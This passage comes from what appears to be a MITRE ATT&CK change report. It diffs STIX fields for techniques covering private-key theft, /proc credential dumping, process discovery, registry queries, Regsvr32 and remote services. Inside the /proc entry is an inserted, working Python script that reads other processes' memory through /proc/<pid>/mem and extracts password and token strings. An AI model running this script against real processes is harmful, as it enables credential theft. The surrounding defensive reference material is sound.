Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia) When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities) On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
external_references[1]['source_name']Wikipedia Public Key CryptoPalo Alto Prince of Persia
external_references[1]['description']Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.
external_references[1]['url']https://en.wikipedia.org/wiki/Public-key_cryptographyhttps://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/
external_references[2]['source_name']Kaspersky Caretocisco_deploy_rsa_keys
external_references[2]['description']Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.Cisco. (2023, February 17). Chapter: Deploying RSA Keys Within a PKI . Retrieved March 27, 2023.
external_references[2]['url']https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdfhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436
external_references[3]['source_name']Palo Alto Prince of PersiaAADInternals Azure AD Device Identities
external_references[3]['description']Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.Dr. Nestori Syynimaa. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved February 21, 2023.
external_references[3]['url']https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/https://aadinternals.com/post/deviceidentity/
x_mitre_data_sources[0]File: File AccessCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Access
x_mitre_detectionMonitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication. For network infrastructure devices, collect AAA logging to monitor for private keys being exported.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Kaspersky Careto', 'description': 'Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.', 'url': 'https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf'}
external_references{'source_name': 'Microsoft Primary Refresh Token', 'description': 'Microsoft. (2022, September 9). What is a Primary Refresh Token?. Retrieved February 21, 2023.', 'url': 'https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token'}
external_references{'source_name': 'Wikipedia Public Key Crypto', 'description': 'Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.', 'url': 'https://en.wikipedia.org/wiki/Public-key_cryptography'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_platformsNetwork

[T1003.007] OS Credential Dumping: Proc Filesystem

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description

Adversaries may gather credentials from information stored in the Proc filesystem or `/proc`. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.

This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.

New Description

Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)

If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
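The new description explains the mechanism: `/proc/<PID>/maps` gives the layout of a process's address space and `/proc/<PID>/mem` gives seekable access to it. The following is an added illustration of that read path; it is not MimiPenguin or any other published tool. `parse_maps()` and `scan_regions()` are pure functions, so they are exercised here against a constructed 16 KiB address space held in a `BytesIO`; `scan_pid()` wires the same functions to the real `/proc` files and, as the description notes, needs either root or ptrace access to the target (same uid with `kernel.yama.ptrace_scope=0`, or `CAP_SYS_PTRACE`). Regions without the read bit and the kernel-owned `[vvar]`/`[vsyscall]` mappings are skipped because reading them fails. The credential regex is a simple heuristic of the kind the description mentions, not a model of any particular program's memory layout.

```python
"""Search a process's memory through /proc/<pid>/maps and /proc/<pid>/mem.

Added illustration. The demo address space and its contents are constructed;
nothing here is a real process image.
"""
import io
import re
from dataclasses import dataclass
from typing import BinaryIO, Iterable, List, Tuple

# key=value style secrets; adjust for the application under investigation
CRED_RE = re.compile(rb"(?i)(?:password|passwd|secret|token)[=:]\s*([^\s\x00\"']{4,64})")


@dataclass
class Region:
    start: int
    end: int
    perms: str   # e.g. 'rw-p'
    path: str    # backing file or pseudo-name such as [heap]; '' for anonymous


def parse_maps(text: str) -> List[Region]:
    """Parse /proc/<pid>/maps lines: 'start-end perms offset dev inode [path]'."""
    regions = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        lo, hi = (int(x, 16) for x in parts[0].split("-"))
        regions.append(Region(lo, hi, parts[1], parts[5].strip() if len(parts) > 5 else ""))
    return regions


def scan_regions(mem: BinaryIO, regions: Iterable[Region], pattern=CRED_RE,
                 chunk: int = 1 << 20) -> List[Tuple[int, bytes]]:
    """Read every readable region from a seekable /proc/<pid>/mem-like stream and regex it."""
    hits = []
    for r in regions:
        if not r.perms.startswith("r") or r.path in ("[vvar]", "[vsyscall]"):
            continue                      # no read permission, or kernel pages that fault
        pos = r.start
        while pos < r.end:
            mem.seek(pos)
            try:
                data = mem.read(min(chunk, r.end - pos))
            except OSError:               # EIO on pages that cannot be read
                break
            if not data:
                break
            for m in pattern.finditer(data):
                hits.append((pos + m.start(), m.group(1)))
            pos += len(data)
    return hits


def scan_pid(pid: int, pattern=CRED_RE) -> List[Tuple[int, bytes]]:
    """Linux only; requires root or ptrace access to the target process."""
    with open(f"/proc/{pid}/maps") as f:
        regions = parse_maps(f.read())
    with open(f"/proc/{pid}/mem", "rb", buffering=0) as mem:
        return scan_regions(mem, regions, pattern)


# Constructed maps listing for the offline demo (small addresses so a BytesIO can back it).
DEMO_MAPS = """00001000-00002000 r-xp 00000000 08:01 4242                       /usr/bin/demo
00002000-00003000 rw-p 00000000 00:00 0                          [heap]
00003000-00004000 ---p 00000000 00:00 0
"""


def demo_scan() -> List[Tuple[int, bytes]]:
    """Plant strings in a constructed address space and scan it like a real process."""
    space = bytearray(0x4000)
    space[0x1010:0x1010 + 12] = b"GET / HTTP/1"          # text segment, no credential
    space[0x2040:0x2040 + 17] = b"password=hunter2\x00"   # heap, should be found at 0x2040
    space[0x3000:0x3000 + 16] = b"secret=unmapped1"       # ---p region, must be skipped
    return scan_regions(io.BytesIO(bytes(space)), parse_maps(DEMO_MAPS))


if __name__ == "__main__":
    for addr, value in demo_scan():
        print(f"0x{addr:x}: {value!r}")
```

On a live system, `scan_pid(os.getpid())` always works for the caller's own process, which is the unprivileged case the description mentions; scanning another user's process is where the permission boundary sits, and a read of `/proc/<pid>/mem` by an unrelated uid is exactly the file-access event the updated data sources (File: File Access, Command: Command Execution) are meant to catch.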
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Tim (Wadhwa-)Brown']
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['root']
values_changed
STIX FieldOld valueNew Value
modified2020-03-19 15:32:18.098000+00:002023-04-15 01:16:25.566000+00:00
descriptionAdversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022) When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations.
Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook) If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
external_references[1]['source_name']MimiPenguin GitHub May 2017baeldung Linux proc map 2022
external_references[1]['description']Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.baeldung. (2022, April 8). Understanding the Linux /proc/id/maps File. Retrieved March 31, 2023.
external_references[1]['url']https://github.com/huntergregal/mimipenguinhttps://www.baeldung.com/linux/proc-id-maps
x_mitre_data_sources[0]File: File AccessCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Access
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Polop Linux PrivEsc Gitbook', 'description': 'Carlos Polop. (2023, March 5). Linux Privilege Escalation. Retrieved March 31, 2023.', 'url': 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem'}
external_references{'source_name': 'MimiPenguin GitHub May 2017', 'description': 'Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.', 'url': 'https://github.com/huntergregal/mimipenguin'}
external_references{'source_name': 'Picus Labs Proc cump 2022', 'description': 'Huseyin Can YUCEEL & Picus Labs. (2022, March 22). Retrieved March 31, 2023.', 'url': 'https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use'}

[T1057] Process Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or `Get-Process` via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via /proc.

New Description

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or `Get-Process` via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via /proc.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)

Dropped Mitigations:

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_contributors: ['Austin Clark, @c2defense']
  x_mitre_deprecated: False
  external_references: Cisco. (2022, August 16). show processes - . Retrieved July 13, 2022.

dictionary_item_removed
  x_mitre_permissions_required: ['User', 'Administrator', 'SYSTEM']
  external_references: CAPEC-573

values_changed
STIX Field: Old value → New Value
  modified: 2020-03-26 18:05:53.130000+00:00 → 2023-04-12 23:34:02.125000+00:00
  description:
    old: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.
    new: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)
  external_references[1]['source_name']: capec → show_processes_cisco_cmd
  external_references[1]['url']: https://capec.mitre.org/data/definitions/573.html → https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760
  x_mitre_detection:
    old: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
    new: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). For network infrastructure devices, collect AAA logging to monitor for `show` commands being run by non-standard users from non-standard locations.
  x_mitre_version: 1.2 → 1.3

iterable_item_added
  external_references: {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
  x_mitre_platforms: Network

[T1012] Query Registry

Current version: 1.3

Version changed from: 1.2 → 1.3

Dropped Mitigations:

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False
  external_references: Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.

dictionary_item_removed
  x_mitre_permissions_required: ['User', 'Administrator', 'SYSTEM']
  external_references: CAPEC-647

values_changed
STIX Field: Old value → New Value
  modified: 2020-03-26 18:08:20.049000+00:00 → 2023-04-03 18:56:37.011000+00:00
  external_references[1]['source_name']: capec → Wikipedia Windows Registry
  external_references[1]['url']: https://capec.mitre.org/data/definitions/647.html → https://en.wikipedia.org/wiki/Windows_Registry
  x_mitre_version: 1.2 → 1.3

iterable_item_added
  x_mitre_data_sources: Process: Process Creation

iterable_item_removed
  external_references: {'source_name': 'Wikipedia Windows Registry', 'description': 'Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.', 'url': 'https://en.wikipedia.org/wiki/Windows_Registry'}
  x_mitre_data_sources: Process: Process Creation

[T1218.010] System Binary Proxy Execution: Regsvr32

Current version: 2.1

Version changed from: 2.0 → 2.1

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False

dictionary_item_removed
  x_mitre_permissions_required: ['Administrator', 'User']

values_changed
STIX Field: Old value → New Value
  modified: 2022-03-11 20:41:41.503000+00:00 → 2023-04-21 12:24:56.148000+00:00
  external_references[1]['source_name']: Microsoft Regsvr32 → FireEye Regsvr32 Targeting Mongolian Gov
  external_references[1]['description']: Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016. → Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.
  external_references[1]['url']: https://support.microsoft.com/en-us/kb/249873 → https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html
  external_references[3]['source_name']: Carbon Black Squiblydoo Apr 2016 → Microsoft Regsvr32
  external_references[3]['description']: Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018. → Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.
  external_references[3]['url']: https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/ → https://support.microsoft.com/en-us/kb/249873
  external_references[4]['source_name']: FireEye Regsvr32 Targeting Mongolian Gov → Carbon Black Squiblydoo Apr 2016
  external_references[4]['description']: Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017. → Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.
  external_references[4]['url']: https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html → https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/
  x_mitre_version: 2.0 → 2.1

iterable_item_added
  x_mitre_data_sources: Network Traffic: Network Connection Creation

iterable_item_removed
  x_mitre_data_sources: Network Traffic: Network Connection Creation

[T1021] Remote Services

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)

Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)

New Description

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain.

Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)

Details

dictionary_item_added
  x_mitre_attack_spec_version: 3.1.0
  x_mitre_deprecated: False
  external_references: Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.

dictionary_item_removed
  external_references: CAPEC-555

values_changed
STIX Field: Old value → New Value
  modified: 2022-03-28 16:07:45.017000+00:00 → 2023-03-30 21:01:42.821000+00:00
  description:
    old: Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)
    new: Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)
  external_references[1]['source_name']: capec → Apple Remote Desktop Admin Guide 3.3
  external_references[1]['url']: https://capec.mitre.org/data/definitions/555.html → https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf
  external_references[2]['source_name']: SSH Secure Shell → Remote Management MDM macOS
  external_references[2]['description']: SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020. → Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.
  external_references[2]['url']: https://www.ssh.com/ssh → https://support.apple.com/en-us/HT209161
  external_references[3]['source_name']: TechNet Remote Desktop Services → Kickstart Apple Remote Desktop commands
  external_references[3]['description']: Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016. → Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.
  external_references[3]['url']: https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx → https://support.apple.com/en-us/HT201710
  external_references[4]['source_name']: Remote Management MDM macOS → Lockboxx ARD 2019
  external_references[4]['description']: Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021. → Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.
  external_references[4]['url']: https://support.apple.com/en-us/HT209161 → http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html
  external_references[5]['source_name']: Kickstart Apple Remote Desktop commands → FireEye 2019 Apple Remote Desktop
  external_references[5]['description']: Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021. → Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.
  external_references[5]['url']: https://support.apple.com/en-us/HT201710 → https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html
  external_references[6]['source_name']: Apple Remote Desktop Admin Guide 3.3 → TechNet Remote Desktop Services
  external_references[6]['description']: Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021. → Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.
  external_references[6]['url']: https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf → https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
  external_references[7]['source_name']: FireEye 2019 Apple Remote Desktop → Apple Unified Log Analysis Remote Login and Screen Sharing
  external_references[7]['description']: Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021. → Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.
  external_references[7]['url']: https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html → https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
  external_references[8]['source_name']: Lockboxx ARD 2019 → SSH Secure Shell
